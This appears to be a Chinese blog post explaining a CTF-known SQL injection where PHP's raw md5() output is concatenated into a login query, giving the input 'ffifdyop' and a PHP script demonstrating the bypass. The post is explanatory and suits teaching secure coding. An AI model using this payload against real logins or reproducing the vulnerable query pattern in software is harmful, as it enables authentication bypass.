1022.MD5加密後的SQL 注入
今天看到$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";這樣一個sql,其實能夠注入。php
思路比較明確,當md5後的hex轉換成字符串後,若是包含'or'<trash>這樣的字符串,那整個sql變成mysql
SELECT * FROM admin WHERE pass = ''or'6<trash>'
很明顯能夠注入了。sql
難點就在如何尋找這樣的字符串,我只是順手牽羊,牽了一個。。
提供一個字符串:ffifdyop
md5後,276f722736c95d99e921722cf9ed621c
再轉成字符串:'or'6<trash>數據庫
測試代碼:post
<?php
error_reporting(0);
$link = mysql_connect('localhost', 'root', '');
if (!$link) {
die('Could not connect to MySQL: ' . mysql_error());
}
// 選擇數據庫
$db = mysql_select_db("test", $link);
if(!$db)
{
echo 'select db error';
exit();
}
// 執行sql
$password = "ffifdyop";
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
var_dump($sql);
$result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' );
$row1 = mysql_fetch_row($result);
var_dump($row1);
mysql_close($link);
?>
效果:
測試
參考:
http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/
http://cvk.posthaven.com/sql-injection-with-raw-md5-hashesfetch
相關文章
- 1. 1022.MD5加密後的SQL 注入
- 2. Jarvis OJ–Login 透過MD5()下的SQL注入學習MD5加密
- 3. PHP的sql注入(密碼是md5加密的)
- 4. MD5+sql注入
- 5. MySql md5加密 sqlserver md5加密 C# md5加密 java md5加密
- 6. sql實現MD5加密
- 7. md5加密md5解密
- 8. MD5 的加密
- 9. Java的MD5加密和解密 Java的MD5加密和解密
- 10. Vue AES+MD5加密 後臺解密
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • YAML 入門教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
